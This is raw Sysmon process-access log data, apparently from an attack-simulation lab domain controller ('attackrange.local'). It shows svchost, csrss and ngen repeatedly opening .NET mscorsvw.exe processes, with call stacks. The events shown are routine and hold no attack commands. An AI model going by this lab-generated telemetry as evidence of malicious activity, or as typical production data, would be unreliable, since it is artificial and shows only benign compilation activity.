13:50:01.104{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.104{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.057{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9209-6005-7C03-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.041{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9209-6005-7C03-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.041{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9209-6005-7C03-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:00.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9208-6005-7B03-00000000A301}1188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.963{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8803-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.947{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8803-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.947{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8803-00000000A301}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
10341000x80000000000000007858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.869{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8703-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.854{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8703-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.854{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8703-00000000A301}2128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8603-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.807{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8603-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.807{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8603-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.760{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8503-00000000A301}4136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.744{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8503-00000000A301}4136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.744{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8503-00000000A301}4136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.682{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8403-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.682{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8403-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.682{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8403-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.619{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920A-6005-8303-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:02.604{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920A-6005-8303-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:02.604{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920A-6005-8303-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
